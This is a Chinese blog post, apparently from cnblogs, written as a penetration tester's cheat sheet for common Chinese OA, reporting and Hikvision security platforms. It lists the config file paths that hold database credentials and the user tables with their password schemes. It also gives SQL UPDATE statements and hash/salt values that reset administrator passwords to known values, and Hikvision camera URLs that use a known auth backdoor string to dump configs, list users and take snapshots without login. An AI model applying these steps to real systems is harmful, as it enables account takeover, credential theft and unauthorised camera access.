瑞友天翼
默认的安装目录是在C:\Program Files (x86)\RealFriend\Rap Server\WebRoot
如果不在默认安装目录可以利用SQL注入通过sql-shell获取数据库的安装目录,从而推导出网站根目录。
配置文件默认路径
C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat
数据库密码解密将#换成=号base64解密,因为一般目标MySQL不允许外连,可以使用Navicat自带的tunnel隧道脚本上传到目标网站上。
用户登陆信息在cassystemds数据库下的cuser表中,通过md5进行加密存储。
泛微OA-cology
数据库管理员账户表:HrmResourceManager
用户名字段:loginid 密码字段:password 密码采用的是MD5加密存储数据库
用户名表:HrmResource
管理员表:HrmResourceManager、TB_USER
用户名字段:loginid 密码字段:password 密码采用的是MD5加密存储数据库
WEAVER/ecology/WEB-INF/prop/weaver.properties
帆软报表
数据库默认配置文件路径:
FineReport 8/9:WEB-INF/resources/privilege.xml
FineReport 10/11:WEB-INF/config/db.properties
蓝凌OA
数据库默认配置文件:
/WEB-INF/KmssConfig/kmssconfig.properties
admin.do密码文件:
/WEB-INF/KmssConfig/admin.properties
数据库账号表: sys_org_person
密码字段: fd_password 密码采用的是MD5加密存储数据库
注意:V16新版现在采用了SM4加密算法
Navicat
导出数据库文件信息:
文件-->导出连接-->选择导出密码-->*.ncx打开Password
用DecryptTools解密即可
致远OA
数据库默认配置文件路径:
D:/Seeyon/A8/base/conf/datasourceCtp.properties
system系统管理员修改后默认密码:admin1234
UPDATE ORG_PRINCIPAL SET CREDENTIAL_VALUE='H/gkvniwcvhqHgcM5RRSq7aVGfE=' WHERE LOGIN_NAME='system';
group-admin修改后默认密码:admin1234
UPDATE ORG_PRINCIPAL SET CREDENTIAL_VALUE='H/gkvniwcvhqHgcM5RRSq7aVGfE=' WHERE LOGIN_NAME='group-admin';
用友NC
数据库默认配置文件路径:
NC65: /home/NC65/ierp/bin/prop.xml
YonBip: ./ncchome/ierp/bin/prop.xml
NCCloud: ./ncchome/ierp/bin/prop.xml
GRP-U8: com/ufgov/midas/qx/sqlmap/jdbc.properties
用户存储表:sm_user
密码替换登录后台:用户001的CUSERID字段值为100112100000000010B4,用户001的密码为nc@123,输入字符串100112100000000010B4:nc@123,生成密码在USER_PASSWORD进行替换登录
海康威视
海康威视综合安防平台(iSecure) 运行管理中心后台登录数据库配置文件路径:
windows路径:D:/hikvision/web/opsMgrCenter/conf/config.properties
Linux路径:/opt/hikvision/web/opsMgrCenter/conf/config.properties
运行管理中心后台登陆用户: 数据库:opsmgr_db 用户表:center_user
对c_password和c_salt替换,用以重置admin的密码为hik123456
c_password:1909408d3304f41421caae1fd5df984f21d70b516a315d375f94f87861eedc92
c_salt:938f7ad2436f3084a19dee5dc2e7a513892b696a8069a2f886ada7562226b1cc
海康威视综合安防平台(iSecure) 运行管理中心前台登录数据库配置文件路径:
windows路径:D:/hikvision/web/components/postgresql96win64.1/conf/config.properties
Linux路径:/opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties
运行管理中心前台登陆用户: 数据库:irds_irdsdb 用户表:tb_user
对user_pwd和salt替换,用以重置admin的密码为hik123456
user_pwd:1909408d3304f41421caae1fd5df984f21d70b516a315d375f94f87861eedc92
Salt:938f7ad2436f3084a19dee5dc2e7a513892b696a8069a2f886ada7562226b1cc
海康威视iVMS 8700 数据库默认配置文件:
/acs/WEB-INF/classes/constants.properties
IP Camera 摄像机配置文件:
http://ip/System/configurationFile?auth=YWRtaW46MTEK
查看系统所有存在用户列表:
http://ip/Security/users?auth=YWRtaW46MTEKYWRtaW46MTEK
获取系统监控快照,不需要进行身份验证:
http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK
标签:路径,配置文件,数据库,常见,OA,密码,默认,properties
From: https://www.cnblogs.com/yywdd/p/18676640